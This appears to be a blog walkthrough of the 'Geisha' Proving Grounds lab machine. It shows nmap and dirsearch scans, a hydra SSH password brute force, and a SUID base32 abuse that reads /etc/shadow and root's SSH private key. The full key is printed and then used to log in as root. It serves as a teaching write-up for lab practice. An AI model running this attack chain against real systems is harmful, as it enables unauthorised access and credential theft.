pg-geisha-play

Geisha

Nmap
sudo nmap 192.168.152.82 -p- -sS -sV
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http Apache httpd 2.4.38 ((Debian))
7080/tcp open ssl/empowerid LiteSpeed
7125/tcp open http nginx 1.17.10
8088/tcp open http LiteSpeed httpd
9198/tcp filtered unknown
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

This one is a little bit tricky as we have multiple web servers which all appear to land us on the same page:

I put all the web server ports and addresses into a text file called list.txt and used dirsearch.py to run through each target.

python3 dirsearch.py -l list.txt -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 60 –full-url

After some time we get an interesting hit on port 7125.

┌──(kali㉿puckie)-[~/offsec/geisha]
└─$ python3 /usr/share/dirsearch/dirsearch.py -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 60 -u http://192.168.122.82:7125

_|. _ _ _ _ _ _|_ v0.4.1
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 60
Wordlist size: 220520

Output File: /home/kali/.dirsearch/reports/192.168.122.82/_21-09-03_05-21-13.txt

Error Log: /home/kali/.dirsearch/logs/errors-21-09-03_05-21-13.log

Target: http://192.168.122.82:7125/

[05:21:14] Starting: 
[05:21:23] 403 - 556B - /shadow
[05:21:41] 200 - 1KB - /passwd
CTRL+C detected: Pausing threads, please wait...
[e]xit / [c]ontinue:

I browsed to the URL and downloaded passwd.

┌──(kali㉿puckie)-[~/offsec/geisha]
└─$ curl http://192.168.122.82:7125/passwd | html2markdown
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 100 1432 100 1432 0 0 7054 0 --:--:-- --:--:-- --:--:-- 7054
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin
--snip--
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
geisha:x:1000:1000:geisha,,,:/home/geisha:/bin/bash systemd-
coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
lsadm:x:998:1001::/:/sbin/nologin

From this we do know the user geisha exists on the system and can start to brute force the user. Running hydra against SSH we soon get a valid hit.

kali@kali:~/geisha$ hydra -l geisha -P /usr/share/wordlists/rockyou.txt ssh://192.168.57.82
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-09-03 07:04:33
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.57.82:22/
[STATUS] 161.00 tries/min, 161 tries in 00:01h, 14344239 to do in 1484:55h, 16 active
[STATUS] 112.33 tries/min, 337 tries in 00:03h, 14344063 to do in 2128:12h, 16 active
[22][ssh] host: 192.168.57.82 login: geisha password: letmein
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
[ERROR] 3 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-09-03 07:09:21
kali@kali:~/geisha$
We now have SSH access as the user.

I have identified the SUID bit being set on the base32 binary.

geisha@geisha:~$ find / -perm -6000 2>/dev/null
/usr/bin/base32
geisha@geisha:~$

According to GTFOBins we can take advantage of this to perform privileged file reads.

Initially I used this to read the /etc/shadow file. However, I was unable to crack the password with rockyou.txt.

Now we could use this to read the proof.txt flag but, we are not really done until we gain a root shell. I decided to have a stab at the root account having a id_rsa key.

geisha@geisha:~$ /usr/bin/base32 /root/.ssh/id_rsa | base32 --decode
-----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEA43eVw/8oSsnOSPCSyhVEnt01fIwy1YZUpEMPQ8pPkwX5uPh4
OZXrITY3JqYSCFcgJS34/TQkKLp7iG2WGmnno/Op4GchXEdSklwoGOKNA22l7pX5
89FAL1XSEBCtzlrCrksvfX08+y7tS/I8s41w4aC1TDd5o8c1Kx5lfwl7qw0ZMlbd
5yeAUhuxuvxo/KFqiUUfpcpoBf3oT2K97/bZr059VU8T4wd5LkCzKEKmK5ebWIB6
fgIfxyhEm/o3dl1lhegTtzC6PtlhuT7ty//mqEeMuipwH3ln61fHXs72LI/vTx26
TSSmzHo8zZt+/lwrgroh0ByXbCtDaZjo4HAFfQIDAQABAoIBAQCRXy/b3wpFIcww
WW+2rvj3/q/cNU2XoQ4fHKx4yqcocz0xtbpAM0veIeQFU0VbBzOID2V9jQE+9k9U
1ZSEtQJRibwbqk1ryDlBSJxnqwIsGrtdS4Q/CpBWsCZcFgy+QMsC0RI8xPlgHpGR
Y/LfXZmy2R6E4z9eKEYWlIqRMeJTYgqsP6ZR4SOLuZS1Aq/lq/v9jqGs/SQenjRb
8zt1BoqCfOp5TtY1NoBLqaPwmDt8+rlQt1IM+2aYmxdUkLFTcMpCGMADggggtnR+
10pZkA6wM8/FlxyAFcNwt+H3xu5VKuQKdqTfh1EuO3c34UmuS1qnidHO1rYWOhYO
jceQYzoBAoGBAP/Ml6cp2OWqrheJS9Pgnvz82n+s9yM5raKNnH57j0sbEp++eG7o
2po5/vrLBcCHGqZ7+RNFXDmRBEMToru/m2RikSVYk8QHLxVZJt5iB3tcxmglGJj/
cLkGM71JqjHX/edwu2nNu14m4l1JV9LGvvHR5m6uU5cQvdcMTsRpkuxdAoGBAOOl
THxiQ6R6HkOt9w/WrKDIeGskIXj/P/79aB/2p17M6K+cy75OOYzqkDPENrxK8bub
RaTzq4Zl2pAqxvsv/CHuJU/xHs9T3Ox7A1hWqnOOk2f0KBmhQTYBs2OKqXXZotHH
xvkOgc0fqRm1QYlCK2lyBBM14O5Isud1ZZXLUOuhAoGBAIBds1z36xiV5nd5NsxE
1IQwf5XCvuK2dyQz3Gy8pNQT6eywMM+3mrv6jrJcX66WHhGd9QhurjFVTMY8fFWr
edeOfzg2kzC0SjR0YMUIfKizjf2FYCqnRXIUYrKC3R3WPlx+fg5CZ9x/tukJfUEQ
65F+vBye7uPISvw3+O8n68shAoGABXMyppOvrONjkBk9Hfr0vRCvmVkPGBd8T71/
XayJC0L6myG02wSCajY/Z43eBZoBuY0ZGL7gr2IG3oa3ptHaRnGuIQDTzQDj/CFh
zh6dDBEwxD9bKmnq5sEZq1tpfTHNrRoMUHAheWi1orDtNb0Izwh0woT6spm49sOf
v/tTH6ECgYEA/tBeKSVGm0UxGrjpQmhW/9Po62JNz6ZBaTELm3paaxqGtA+0HD0M
OuzD6TBG6zBF6jW8VLQfiQzIMEUcGa8iJXhI6bemiX6Te1PWC8NMMULhCjObMjCv
bf+qz0sVYfPb95SQb4vvFjp5XDVdAdtQov7s7XmHyJbZ48r8ISHm98s=
-----END RSA PRIVATE KEY-----

geisha@geisha:~$
I then transferred the key over to my attacking machine and used chmod to set appropriate permissions.
chmod 600 id_rsa

Then used the id_rsa key to connect in as root on SSH.

ssh -i id_rsa root@192.168.152.82
Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *